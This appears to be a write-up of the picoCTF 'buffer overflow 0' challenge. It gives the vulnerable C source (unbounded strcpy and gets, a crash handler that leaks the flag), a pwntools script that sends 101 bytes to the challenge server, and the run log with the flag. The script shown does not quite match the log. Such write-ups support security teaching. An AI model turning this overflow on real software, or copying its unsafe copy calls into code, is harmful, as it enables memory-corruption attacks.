buffer overflow 0
*  
binary  
picoctf

Let's start off simple, can you overflow the correct buffer?

Two files are given: the binary vuln and the source file vuln.c:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>

/* Size of the flag buffer. main() passes it to fgets(), so at most
 * FLAGSIZE_MAX - 1 characters of flag.txt are kept, plus the NUL. */
#define FLAGSIZE_MAX 64

/* File-scope copy of the flag: filled by main(), printed by sigsegv_handler(). */
char flag[FLAGSIZE_MAX];

/*
 * Signal handler that main() registers for SIGSEGV: prints the flag followed
 * by a newline, flushes stdout and exits with status 1.
 *
 * sig: the signal number; it is not used.
 *
 * Security note: because main() installs this for SIGSEGV, any segmentation
 * fault in the process discloses the secret held in flag. This appears to be
 * the intended challenge design; a crash handler outside a CTF must never
 * emit secrets.
 * NOTE(review): printf(), fflush() and exit() are not async-signal-safe; a
 * handler in real code would be limited to calls such as write() and _exit().
 */
void sigsegv_handler(int sig) {
printf("%s\n", flag);
/* Flush explicitly so the output is not left in the stdio buffer. */
fflush(stdout);
exit(1);
}

/*
 * Copies the caller's string into a 16-byte stack buffer and returns.
 *
 * input: NUL-terminated string; main() passes the line it read with gets().
 *
 * Defect (CWE-121, stack-based buffer overflow): strcpy() has no length
 * limit, so any input of 16 or more characters writes past the end of buf2
 * (16 characters plus the terminating NUL need 17 bytes). The remedy is a
 * bounded copy that rejects or truncates long input, for example
 * snprintf(buf2, sizeof buf2, "%s", input) with the return value checked.
 */
void vuln(char *input){
char buf2[16];
/* Unbounded copy: the length of input is never compared with sizeof buf2. */
strcpy(buf2, input);
}

/*
 * Loads the flag from flag.txt, installs the SIGSEGV handler, reads one line
 * from stdin and hands it to vuln().
 *
 * argc, argv: not used.
 * Returns 0 after printing the exit message; exits with status 0 earlier if
 * flag.txt cannot be opened.
 *
 * NOTE(review): getegid() and setresgid() are declared in <unistd.h>
 * (setresgid() also needs _GNU_SOURCE on glibc), which the visible include
 * list lacks. The return values of fgets() and setresgid() are not checked
 * and f is never closed.
 */
int main(int argc, char **argv){
FILE *f = fopen("flag.txt","r");
if (f == NULL) {
printf("%s %s", "Please create 'flag.txt' in this directory with your",
"own debugging flag.\n");
exit(0);
}
/* Keeps at most FLAGSIZE_MAX - 1 characters of the first line of flag.txt. */
fgets(flag,FLAGSIZE_MAX,f);
signal(SIGSEGV, sigsegv_handler); // From here on, a segmentation fault runs sigsegv_handler, which prints the flag
/* Set the real, effective and saved group IDs to the current effective GID. */
gid_t gid = getegid();
setresgid(gid, gid, gid);


printf("Input: ");
fflush(stdout);
char buf1[100];
/* Defect (CWE-242, inherently dangerous function): gets() cannot limit how
 * much it reads, so a line of 100 or more characters overflows buf1 before
 * vuln() is even called. gets() was removed in C11;
 * fgets(buf1, sizeof buf1, stdin) is the bounded replacement. */
gets(buf1);
/* The line is passed on unchecked; vuln() copies it into a 16-byte buffer. */
vuln(buf1);
printf("The program will exit now\n");
return 0;
}

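To get the flag, a buffer overflow is needed: main() installs a SIGSEGV handler that prints the flag, and vuln() copies the input into the 16-byte buf2 with strcpy() without checking its length. An input longer than the buffer corrupts the stack, and the resulting segmentation fault runs the handler. The script sends 101 bytes, more than either buf2 (16 bytes) or buf1 (100 bytes) can hold: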
def rem():
    """Send an over-long line to the challenge service and print its reply.

    Opens a pwntools ``remote`` connection to the picoCTF instance, waits for
    the ``Input: `` prompt, sends 101 ``A`` bytes (more than the 100-byte
    ``buf1`` and the 16-byte ``buf2`` in vuln.c can hold) and prints the next
    line the service returns.
    """
    host, port = "saturn.picoctf.net", 61338
    conn = remote(host, port)
    # NOTE(review): the delimiter is a str, which is why pwntools emits the
    # BytesWarning shown in the run below; b"Input: " would avoid it.
    prompt = conn.recvuntil("Input: ")
    print(prompt)
    payload = b"A" * 101
    conn.sendline(payload)
    reply = conn.recvline()
    print(reply)


$ python3 script.py
[+] Opening connection to saturn.picoctf.net on port 61338: Done
/home/cheepsss/Documents/buffer overflow 0/script.py:15: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
print(r.recvuntil("Input: "))
b'Input: '
b'picoCTF{ov3rfl0ws_ar3nt_that_bad_9f2364bc}\n
picoCTF{ov3rfl0ws_ar3nt_that_bad_9f2364bc}